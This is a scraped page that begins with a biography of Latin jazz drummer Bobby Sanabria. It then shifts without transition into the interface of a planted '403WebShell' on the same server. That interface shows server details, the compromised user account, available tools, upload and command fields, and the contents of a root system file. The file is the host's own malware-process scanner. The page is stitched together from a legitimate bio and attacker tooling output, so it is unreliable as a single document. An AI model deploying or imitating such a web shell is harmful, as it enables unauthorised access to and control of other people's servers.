About

Bobby Sanabria is a 7-time Grammy-nominee as a leader. He is a noted drummer, percussionist, composer, arranger, conductor, producer, educator, documentary film maker, and bandleader of Puerto Rican descent born and raised in NY’s South Bronx. He was the drummer for the acknowledged creator of Afro-Cuban jazz, Mario Bauzá touring and recording three CD’s with him, two of which were Grammy nominated, as well as an incredible variety of artists. From Dizzy Gillespie, Tito Puente, Mongo Santamaria (with whom he started his career) Paquito D’Rivera, Yomo Toro, Candido, The Mills Brothers, Ray Barretto, Chico O’Farrill, Francisco Aguabella, Henry Threadgill, Luis “Perico” Ortiz, Daniel Ponce, Larry Harlow, Daniel Santos, Celia Cruz, Adalberto Santiago, Xiomara Portuondo, Pedrito Martinez, Roswell Rudd, Patato, David Amram, the Cleveland Jazz Orchestra, Michael Gibbs, Charles McPherson Jon Faddis, Bob Mintzer, Phil Wilson, Randy Brecker, Charles Tolliver, M’BOOM, Michelle Shocked, Marco Rizo, and many more. In addition he has guest conducted and performed as a soloist with numerous orchestras like the WDR Big Band, The Airmen of Note, The U.S. Jazz Ambassadors, Eau Claire University Big, The University of Calgary Big Band to name just a few.

His first big band recording, Live & in Clave!!! was nominated for a Grammy in 2001. A Grammy nomination followed in 2003 for 50 Years of Mambo: A Tribute to Perez Prado. His 2008 Grammy nominated Big Band Urban Folktales was the first Latin jazz recording to ever reach #1 on the national Jazz Week charts. In 2009 the Afro-Cuban Jazz Orchestra he directs at the Manhattan School of Music was nominated for a Latin Grammy for Kenya Revisited Live!!!, a reworking of the music from Machito’s greatest album, Kenya. In 2011 the recording Tito Puente Masterworks Live!!! by the same orchestra under Bobby’s direction was nominated for a Latin Jazz Grammy. Partial proceeds from the sale of both CD’s continue to support the scholarship program in the Manhattan School of Music’s jazz program. Bobby’s 2012 big band recording, inspired by the writings of Mexican author Octavio Paz, entitled MULTIVERSE was nominated for 2 Grammys. His work as an activist led him to fight to reinstate the Latin Jazz category after NARAS decided to eliminate many ethnic and regional categories in 2010. He and three other colleagues actually sued the Grammys which led to the reinstatement of the category. He is an associate producer of and featured interviewee in the documentaries, The Palladium: Where Mambo Was King, winner of the IMAGINE award for Best TV documentary of 2003, and the Alma Award winning From Mambo to Hip Hop: A South Bronx Tale where he also composed the score in 2006 and was broadcast on PBS. In 2009 he was a consultant and featured on screen personality in Latin Music U.S.A. also broadcast on PBS. In 2017 he was also a consultant and featured on air personality for the documentary We Like It Like That: The Story of Latin Boogaloo. He is the composer for the score of the 2017 documentary Some Girls. DRUM! Magazine named him Percussionist of the Year in 2005; he was also named 2011 and 2013 Percussionist of the Year by the Jazz Journalists Association. This South Bronx native of Puerto Rican parents was a 2006 inductee into the Bronx Walk of Fame. He holds a BM from the Berklee College of Music and is on the faculty of the New School University and the Manhattan School of Music where he has taught Afro-Cuban Jazz Orchestras passing on the tradition while moving it forward. His recording with the Manhattan School of Music Afro-Cuban Jazz Orchestra entitled “Que Viva Harlem!” released in 2014 on the Jazzheads label has received ****1/2 stars in Downbeat magazine.

Mr. Sanabria has conducted hundreds of clinics in the states and worldwide under the auspices of TAMA Drums, Sabian Cymbals, Remo Drumheads, Vic Firth Sticks and Latin Percussion Inc. His background having performed and recorded as both a drummer and/or percussionist with every major figure in the history of Latin jazz, as well as his encyclopedic knowledge of both jazz and Latin music history, makes him unique in his field. His critically acclaimed video instructional series, Conga Basics Volumes 1, 2 and 3, have been the highest selling videos in the history of video instruction and have set a standard worldwide. He is the Co-Artistic Director of the Bronx Music Heritage Center and is part of Jazz at Lincoln Center’s Jazz Academy as well as The Weill Music Institute at Carnegie Hall. His latest recording released in July 2018 is a monumental Latin jazz reworking of the entire score of West Side Story entitled, West Side Story Reimagined, on the Jazzheads label in celebration of the shows recent 60th anniversary (2017) and its composer, Maestro Leonard Bernstein’s centennial (2018). Partial proceeds from the sale of this historic double CD set go the Jazz Foundation of America’s Puerto Relief Fund to aid Bobby’s ancestral homeland after the devastation form hurricanes Irma and Maria.

403WebShell
403Webshell
Server IP : 23.235.221.107  /  Your IP : 216.73.217.144
Web Server : Apache
System : Linux drums.jazzcorner.com 4.18.0-513.24.1.el8_9.x86_64 #1 SMP Mon Apr 8 11:23:13 EDT 2024 x86_64
User : bsanabri ( 1025)
PHP Version : 8.1.34
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /bin/imh-procwatch
#!/usr/lib/imh-scan/venv/bin/python3
"""Check of the current running processes on the server for malware"""
import os
import platform
import re
import shlex
import sys
import time
import pwd
import configparser
import subprocess
import argparse
import signal
from dataclasses import dataclass
import socket
from pathlib import Path

# import io
from typing import Union
import yaml
import rads
import rads.color as c
import psutil
from clamlib import ScanResult, Scanner, ask_prompt, jail_files

if rads.IMH_ROLE == 'shared':
    QUARANTINE = '/opt/sharedrads/quarantine'
else:
    QUARANTINE = '/opt/dedrads/quarantine'

sys.stdout.reconfigure(errors="surrogateescape", line_buffering=True)
sys.stderr.reconfigure(errors="surrogateescape", line_buffering=True)

PROC_RE = re.compile(r'php\d?(?:-fpm|-cgi)?|perl$')
INI_FILE = '/opt/imh-scan/procwatch/settings.ini'
Q_DIR = Path('/opt/imh-scan/procwatch/q')
SCANLOG_DIR = Path('/opt/imh-scan/procwatch/scanlog')
IGNORE_DIR = Path('/opt/imh-scan/ignore')


@dataclass
class ProcData:
    pid: int
    username: str
    cwd: str
    cmdline: str
    uid: int


class Config(configparser.ConfigParser):
    def __init__(self):
        super().__init__()
        if not self.read(INI_FILE):
            sys.exit(f"Could not read {INI_FILE}")

    @property
    def rolloff(self) -> int:
        return self.getint('tolerance', 'rolloff')

    @property
    def cooldown(self) -> int:
        return self.getint('tolerance', 'cooldown')

    @property
    def ignore_duration(self) -> int:
        return self.getint('tolerance', 'ignore_duration')

    @property
    def admin_email(self) -> str:
        return self.get('notify', 'admin_email')


class ProcWatch:
    def __init__(self, args, conf: Config):
        self.conf = conf
        self._verbose: bool = args.verbose
        self.ignore: Union[int, None] = args.ignore
        self.quarantine: bool = args.quarantine
        self.user: Union[str, None] = args.user
        self.ignore_run: bool = args.ignore_run
        self.hostname = socket.gethostname()
        self.time = int(time.time())
        self.lock_socket = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
        self.scanner = Scanner(
            disable_default=True,
            disable_freshclam=True,
            verbose=False,
            heuristic=True,
            exclude=[],
            extra_heuri=False,
            install=False,
            update=False,
            phishing=False,
            disable_media=False,
            disable_excludes=False,
            enable_maldetect=True,
            disable_new_yara=False,
        )

    def verbose(self, *args, **kwargs):
        """extra stdout for the -v flag"""
        if self._verbose:
            print(*args, **kwargs)

    @staticmethod
    def _scannable_proc(proc: psutil.Process) -> bool:
        if proc.info['uids'].effective == 0:
            return False
        return PROC_RE.match(proc.info['name'])

    def audit_procs(self):
        """looks at existing procs, gets their open files, and scans them"""
        self.verbose('running audit')
        procs = filter(
            self._scannable_proc,
            psutil.process_iter(['pid', 'uids', 'name', 'username', 'cwd']),
        )
        procs = list(procs)  # generator -> list
        path_to_procs: dict[Path, list[ProcData]] = {}
        self.verbose('procs found:', procs)
        for proc in procs:
            try:
                cmdline = proc.cmdline()
                if cmdline[0].startswith('php-fpm: pool'):
                    continue
            except Exception:
                continue
            p_data = ProcData(
                pid=proc.info['pid'],
                username=proc.info['username'],
                cwd=proc.info['cwd'],
                cmdline=shlex.join(cmdline),
                uid=proc.info['uids'].effective,
            )
            if self.should_ignore(proc.info['username']):
                self.verbose("ignoring", proc.info['username'])
                continue
            try:
                # guessing file path based on cmdline
                path_guess = Path(p_data.cwd, cmdline[-1].lstrip('/'))
                self.verbose(f'path guess: {path_guess}\n  cwd: {p_data.cwd}')
                if path_guess.is_file() and self.check_file(
                    path_guess, p_data.uid
                ):
                    if path_to_procs.get(path_guess):
                        path_to_procs[path_guess].append(p_data)
                    else:
                        path_to_procs[path_guess] = [p_data]
                    # proc_list[path_guess] = p_data
            except Exception as exc:
                self.verbose(f'failed to guess path of original file:\n{exc}')
            try:
                for open_file in proc.open_files():
                    file_path = Path(open_file[0])
                    if self.check_file(file_path, p_data['uid']):
                        if not path_to_procs.get(file_path):
                            path_to_procs[file_path] = [p_data]
                        else:
                            path_to_procs[file_path].append(p_data)
            except Exception as exc:
                self.verbose(type(exc).__name__, exc, sep=': ')
        scan_paths = list(map(str, path_to_procs))
        self.verbose('scan paths:', *scan_paths, sep='\n')
        if not scan_paths:
            return
        result = self.run_scan(paths=scan_paths)
        if not result:
            return  # run_scan already printed the error
        self.verbose('results:', *result.all_found, sep='\n')
        if not result:
            self.verbose('no malware procs detected')
            return
        user_list: dict[str, list[ProcData]] = {}
        pid_list: list[int] = []

        for file_path in result.all_found.keys():
            for proc in path_to_procs[file_path]:
                pid = proc.pid
                if pid in pid_list:
                    continue
                if self.quarantine:
                    self.verbose(f'killing {pid}')
                    os.kill(pid, signal.SIGKILL)
                if not user_list.get(proc.username):
                    user_list[proc.username] = [proc]
                else:
                    user_list[proc.username].append(proc)
                pid_list.append(pid)
        for user, p_datas in user_list.items():
            self.queue_scan(user, p_datas)

    def check_file(self, file_path: Path, uid: int):
        """checks if a file should be scanned by audit_procs"""
        self.verbose('checking', file_path)
        if not file_path.is_file():
            return False
        try:
            stat = file_path.stat()
        except OSError as exc:
            self.verbose(type(exc).__name__, exc, sep=': ')
            return False
        if stat.st_uid != uid:
            self.verbose('proc owner doesnt own the file:', file_path)
            return False
        if stat.st_uid == 0:
            self.verbose('skipping root file:', file_path)
            return False
        if stat.st_size > 25 * 2**20:  # file is > 25 MiB
            return False
        return True

    def run_scan(
        self,
        paths: Union[list[str], None] = None,
        user: Union[str, None] = None,
    ) -> Union[ScanResult, None]:
        """runs a scan on targeted files found during audit
        queues a full user scan if something is detected"""
        if not paths and not user:
            self.verbose('error: no scan targets')
            sys.exit(1)
        scan_paths = paths or []
        if user:
            try:
                homedir = rads.get_homedir(user)
            except Exception as exc:
                print(f"{user}: {exc}", file=sys.stderr)
                return None
            scan_paths.append(homedir)
        self.scanner.cpu_wait()
        self.verbose('about to scan')
        result: ScanResult = self.scanner.scan(
            scan_paths=scan_paths, log_tuples=[]
        )
        if user:
            self.ignore_user(user, self.conf.cooldown)
        self.verbose(result.summary)
        return result

    def queue_scan(self, user: str, p_datas: list[ProcData]):
        """queues a scan after finding a malicious file during audit"""
        queue_user = Q_DIR / user
        if queue_user.exists():
            # scan already queued
            self.verbose('scan already queued for', user)
            return
        # dump to queue full user scan
        self.yaml_dump(list(map(vars, p_datas)), queue_user)

    def full_quarantine(self, user: str):
        """full user quarantine using seanc rad"""
        try:
            subprocess.call([QUARANTINE, '-f', user], timeout=600)
        except FileNotFoundError:
            print('Error:', QUARANTINE, 'command not found', file=sys.stderr)
            return False
        except subprocess.TimeoutExpired:
            print('Error: Quarantining', user, 'timed out.', file=sys.stderr)
            return False
        return True

    def should_ignore(self, user: str):
        """function for checking if users are on the manual ignore list
        if the current time passes the mtime of the file, stop ignoring"""
        ignore_file = IGNORE_DIR / user
        try:
            mtime = ignore_file.stat().st_mtime
        except FileNotFoundError:
            return False
        if mtime > self.time:
            self.verbose(f'ignoring {user}, {ignore_file} detected ')
            return True
        return False

    def iter_queue(self):
        """parent function to handle checking history then execute actions
        mostly just runs the user scanning function"""
        for entry in Q_DIR.iterdir():
            user = entry.name
            try:
                pwd.getpwnam(user)
            except KeyError:
                # user doesnt exist
                self.verbose(f"user {user} doesn't exist")
                entry.unlink()
                continue
            actions = self.check_history(user)
            if not actions:
                self.verbose('doing nothing')
                continue
            yield user, actions

    def check_history(self, user: str) -> list[str]:
        """checks history file for previous offenses mostly unused logic as all
        offenses are manually reviewed unless auto quarantine mode is enabled"""
        try:
            homedir = Path(pwd.getpwnam(user).pw_dir)
        except KeyError:
            print('Error: user', user, 'does not exist', file=sys.stderr)
            return []
        if not homedir.exists():
            print('Error:', homedir, 'does not exist', file=sys.stderr)
            return []
        path = homedir / '.imh/.audit_history'
        path.parent.mkdir(mode=0o700, parents=True, exist_ok=True)
        if not path.exists():
            self.verbose('first offense, new history file')
            self.yaml_dump([self.time], path, 0o600)
            return ['notify_admin']
        try:
            history_data = self.yaml_load(path)
        except Exception as exc:
            print(f'resetting {path} due to error: {exc}')
            history_data = None
        else:
            if not isinstance(history_data, list):
                print('history_data not a list, resetting')
                history_data = None
            for entry in history_data:
                if not isinstance(entry, int):
                    print('history_data entry not an integer, resetting')
                    history_data = None
                    break
        if history_data is None:
            self.yaml_dump([self.time], path, 0o600)
            history_data = [self.time]
            return ['notify_admin']
        historic_ct = 0
        repeat_ct = 0
        day_ct = 0
        history_data: list[int]
        for stamp in history_data:
            time_diff = self.time - stamp
            if time_diff < 0:
                self.verbose('error: negative time diff')
            # rolloff time
            # 6 months
            if time_diff > self.conf.rolloff:
                self.verbose('old offender')
                historic_ct += 1
            # 24 hours
            elif time_diff > 86400:
                self.verbose('offense about 24 hours ago')
                day_ct += 1
            # 3 hours
            elif time_diff > 10800:
                self.verbose('offense about 3 hours ago')
                repeat_ct += 1
            # cooldown
            elif time_diff < self.conf.cooldown:
                self.verbose('user on cooldown')
                return []
        if repeat_ct:
            # repeat within 3 hours
            self.verbose('offense repeat within 3 hours, frequent_offense')
        elif day_ct:
            # repeat within 24 hours
            self.verbose('offense repeat within 24 hours, daily_offense')
        elif not historic_ct:
            # normal first offence
            self.verbose('first_offense normal')
        elif historic_ct <= 3:
            # occasional offender
            self.verbose('historic offender within 182 days')
        elif historic_ct > 3 and not repeat_ct:
            # chronic offender
            self.verbose('first_offense historic')
        history_data.append(self.time)
        self.yaml_dump(history_data, path)
        return ['notify_admin']

    def handle_user(self, user: str, actions: list[str]):
        """executes the user scan handles auto quarantine"""
        # The only behavior implemented is to scan the user and notify.
        # This assert forces a crash if someone later edits check_history and
        # doesn't adjust here too.
        assert actions[0] == 'notify_admin'
        queue_file = Q_DIR / user
        self.verbose(f'initiating scan on {user}')
        result = self.run_scan(user=user)
        if not result or not result.all_found:
            self.verbose('nothing detected')
            queue_file.unlink(missing_ok=True)
            return
        data = vars(result)
        data['p_datas'] = self.yaml_load(queue_file)
        p_datas = [ProcData(**x) for x in data['p_datas']]
        self.yaml_dump(data, SCANLOG_DIR / user)
        self.send_notice(user, result, p_datas, SCANLOG_DIR / user)
        queue_file.unlink(missing_ok=True)

    def yaml_load(self, file_name):
        """basic yaml loading function, uses SafeLoader"""
        try:
            with open(file_name, encoding='utf-8') as file:
                return yaml.load(file, Loader=yaml.SafeLoader)
        except Exception as exc:
            print(f'error failed to load yaml file: {file_name}\n{exc}')
            sys.exit(1)

    def yaml_dump(
        self, data: Union[dict, list], path: Path, mode: Union[int, None] = None
    ):
        """basic yaml dump function"""
        try:
            with open(path, 'w', encoding='utf-8') as file:
                yaml.dump(data, file)
        except Exception as exc:
            sys.exit(f'error failed to dump yaml file: {path}\n{exc}')
        if mode is not None:
            path.chmod(mode)

    def send_notice(
        self,
        user: str,
        result: ScanResult,
        p_datas: list[ProcData],
        log_path: Path,
    ):
        """sends email notices on positive user scans"""
        proc_info = 'Original procwatch detected process info:\n'
        try:
            for p_data in p_datas:
                if psutil.pid_exists(p_data.pid):
                    proc_status = '(currently running!!!)'
                else:
                    proc_status = '(not currently running)'
                proc_info += (
                    f'\npid: {p_data.pid} {proc_status}\n'
                    f'cwd: {p_data.cwd}\n'
                    f'cmdline: {p_data.cmdline}\n'
                )
        except Exception as exc:
            self.verbose(f'error getting process data:\n{exc}')
        detections = ''
        for path, sig in result.all_found.items():
            detections += f'{path}: {sig}\n'
        host = platform.node().split('.')[0]
        message = f"""
imh-procwatch has detected a running malicious processes for {user}.
A full user scan has been completed.

The command to view, quarantine, and kill processes is below:
[root@{host} ~]# imh-procwatch -u {user}

{proc_info}
Hostname: {self.hostname}
Log path: {log_path}

Detections:
{detections}
{result.summary}
"""
        self.verbose(f'trying to send email to {self.conf.admin_email}')
        try:
            rads.send_email(
                to_addr=self.conf.admin_email,
                subject=f'imh-procwatch scan results for {user}',
                body=message,
                ssl=True,
                server=('localhost', 465),
                errs=True,
            )
        except Exception as exc:
            self.verbose(type(exc).__name__, exc, sep=': ')

    def ignore_user(self, user: str, duration: int):
        """Marks a user to be ignored for x days. Theres an automatic 24 hour
        cooldown for all users, so it should only be used for longer ignore
        periods"""
        ignore_mtime = self.time + duration
        ignore_file = IGNORE_DIR / user
        ignore_file.touch(mode=0o644, exist_ok=True)
        os.utime(ignore_file, (ignore_mtime, ignore_mtime))
        self.verbose(f'setting procwatch to ignore {user} for {self.ignore}s')

    def get_lock(self):
        """domain socket locking to avoid stacking procs"""
        try:
            self.lock_socket.bind('\0imh-procwatch')
            return True
        except OSError:
            return False

    @staticmethod
    def is_owner(user, file_path):
        try:
            owner = Path(file_path).owner()
        except Exception:
            print(c.yellow('WARN: skipping missing file:'), file_path)
            return False
        if owner != user:
            print(
                c.yellow('WARN: file not owned by the user, skipping it:'),
                file_path,
            )
            return False
        return True

    def q_prompt(self):
        """function for automating the detection review process
        imh-procwatch -u {user}"""
        assert isinstance(self.user, str)
        scanlog = SCANLOG_DIR / self.user
        if not scanlog.exists():
            sys.exit(f'error: no scanlog found for user at {scanlog}')
        loaded = self.yaml_load(scanlog)
        result = ScanResult(
            command=loaded['command'],
            hits_found={Path(k): v for k, v in loaded['hits_found'].items()},
            heur_found={Path(k): v for k, v in loaded['heur_found'].items()},
            summary=loaded['summary'],
        )
        for path, sig in result.hits_found.copy().items():
            if self.is_owner(self.user, path):
                print(path, c.red(sig), sep=':')
            else:
                result.hits_found.pop(path)
        for path, sig in result.heur_found.copy().items():
            if self.is_owner(self.user, path):
                print(path, c.yellow(sig), sep=':')
            else:
                result.heur_found.pop(path)
        if result.all_found:
            user_input = ask_prompt(
                'Would you like to quarantine the detected files? (y|n|a|f)',
                c.yellow('y = excludes heuristics'),
                c.green('n = no quarantine'),
                c.red('a = quarantines all detections'),
                c.red('f = runs full user quarantine using rad'),
                chars=('y', 'n', 'a', 'f'),
            )
            if user_input == 'a':
                jail_files(list(result.all_found))
            elif user_input == 'y':
                jail_files(list(result.hits_found))
            elif user_input == 'f':
                self.full_quarantine(self.user)
            else:
                print('skipping quarante due to user input')
        else:
            print('WARN: no files to quarantine')
        p_datas = [ProcData(**x) for x in loaded['p_datas']]
        for p_data in p_datas:
            if not psutil.pid_exists(p_data.pid):
                print(f'pid no longer running: {p_data.pid}')
                continue
            proc_obj = psutil.Process(p_data.pid)
            cmdline = proc_obj.cmdline()
            user_input = ask_prompt(
                c.red("WARNING: process is still running"),
                f"pid: {p_data.pid}",
                f"cmdline: {cmdline}",
                c.bold('Would you like to kill the detected process? (y|n|a)'),
                c.yellow('y = only kills the pid (SIGTERM)'),
                c.green('n = no kill'),
                c.red('a = runs "pkill -9 -u {self.user}"'),
                chars=('y', 'n', 'a'),
            )
            if user_input == 'a':
                cmd = ['pkill', '-9', '-u', self.user]
                cmd_str = ' '.join(cmd)
                print(f'running cmd: {cmd_str}')
                subprocess.check_output(cmd)
                time.sleep(1)
            elif user_input == 'y':
                print(f"killing pid: {p_data.pid}")
                try:
                    proc_obj.kill()
                except Exception as exc:
                    print(f'error killing process:\n{exc}')
            elif user_input == 'n':
                print('not killing process')

        self.reset_cpanel(self.user)
        cron_path = Path('/var/spool/cron', self.user)
        if not cron_path.is_file():
            print(f'No cron file at {cron_path}')
            return
        print(c.green('Showing contents of'), f"{c.red(cron_path)}:")
        with open(cron_path, encoding='utf-8') as file:
            for line in file:
                if line.strip():  # skip printing blank lines
                    print(line, end='')

    def reset_cpanel(self, user, prompt=True):
        shared_path = '/opt/sharedrads/reset_cpanel'
        ded_path = '/opt/dedrads/reset_cpanel'
        if Path(shared_path).is_file():
            reset_path = shared_path
        elif Path(ded_path).is_file():
            reset_path = ded_path
        else:
            self.verbose('reset_cpanel not found')
            return
        if not prompt:
            return
        user_input = ask_prompt(
            'Would you like to reset the cpanel user password? (y|n)',
            c.yellow('y = runs reset'),
            c.green('n = doesnt reset'),
            chars=('y', 'n'),
        )
        if user_input == 'n':
            print('ok: skipping cpanel password reset')
            return
        assert user_input == 'y'
        cmd = [reset_path, user, '-m', 'Active malware detected']
        print(f'running: {" ".join(cmd)}')
        try:
            out = subprocess.check_output(cmd)
            print(out)
        except Exception as exc:
            print(f'error: failed cpanel_reset:\n{exc}')


def check_cpu():
    """Exit if load is higher than cpu count"""
    cpu_limit = os.cpu_count()
    loadavg = os.getloadavg()[0]
    if loadavg >= cpu_limit:
        sys.exit(
            f'error: load exceeds cpu count, aborting. {loadavg} > {cpu_limit}'
        )


def get_args(conf: Config):
    """gets arguments"""
    parser = argparse.ArgumentParser(description=__doc__)
    # fmt: off
    parser.add_argument(
        '-a', '--audit', action='store_true',
        help='aduit processes for malware',
    )
    parser.add_argument(
        '-c', '--check-queue', action='store_true',
        help='check procwatch queue and run scans',
    )
    parser.add_argument(
        '-q', '--quarantine', action='store_true',
        help='automatically quarantine malware',
    )
    parser.add_argument(
        '-i', '--ignore', type=int, nargs='?', default=None, const='',
        help='has procwatch ignore user for int(N) days, use with -u [USER]',
    )
    parser.add_argument(
        '-v', '--verbose', action='store_true',
        help='enables verbose output to stdout',
    )
    parser.add_argument(
        '-A', '--all', action='store_true',
        help='runs the audit then checks the queue',
    )
    parser.add_argument(
        '-u', '--user', help='checks for completed user scanlogs'
    )
    # fmt: on
    args = parser.parse_args()
    if args.user:
        if not rads.is_cpuser(args.user):
            parser.print_help()
            sys.exit('error: invalid username, exiting')
        if args.user == 'root':
            sys.exit('error: procwatch doesnt support root audits')
    if args.ignore == '':  # -i flag with no input
        args.ignore = conf.ignore_duration
        args.ignore_run = True
    elif args.ignore is None:  # no -i flag
        args.ignore_run = False
    else:  # -i flag with input
        args.ignore *= 86400  # days -> secs
        args.ignore_run = True
    if args.ignore_run and not args.user:
        sys.exit('error: ignore flag needs a user specified with -u')
    if args.check_queue:
        if not args.quarantine and '@' not in conf.admin_email:
            sys.exit(
                'error: email address invalid and is required '
                'when not using auto quarantine'
            )
    return args


def main():
    conf = Config()
    args = get_args(conf)
    if os.getuid() != 0:
        sys.exit("This script must run as root")
    IGNORE_DIR.mkdir(mode=0o755, parents=True, exist_ok=True)
    Q_DIR.mkdir(mode=0o755, parents=True, exist_ok=True)
    SCANLOG_DIR.mkdir(mode=0o700, parents=True, exist_ok=True)
    check_cpu()
    proc_watch = ProcWatch(args, conf)
    if args.user and not proc_watch.ignore_run:
        proc_watch.q_prompt()
        return
    if proc_watch.ignore_run:
        proc_watch.ignore_user(args.user, args.ignore)
        return
    if args.audit or args.all:
        proc_watch.audit_procs()
    if args.check_queue or args.all:
        if not proc_watch.get_lock():
            proc_watch.verbose('scanner already running the queue')
            sys.exit(1)
        for user, actions in proc_watch.iter_queue():
            proc_watch.handle_user(user, actions)


if __name__ == '__main__':
    main()

Youez - 2016 - github.com/yon3zu
LinuXploit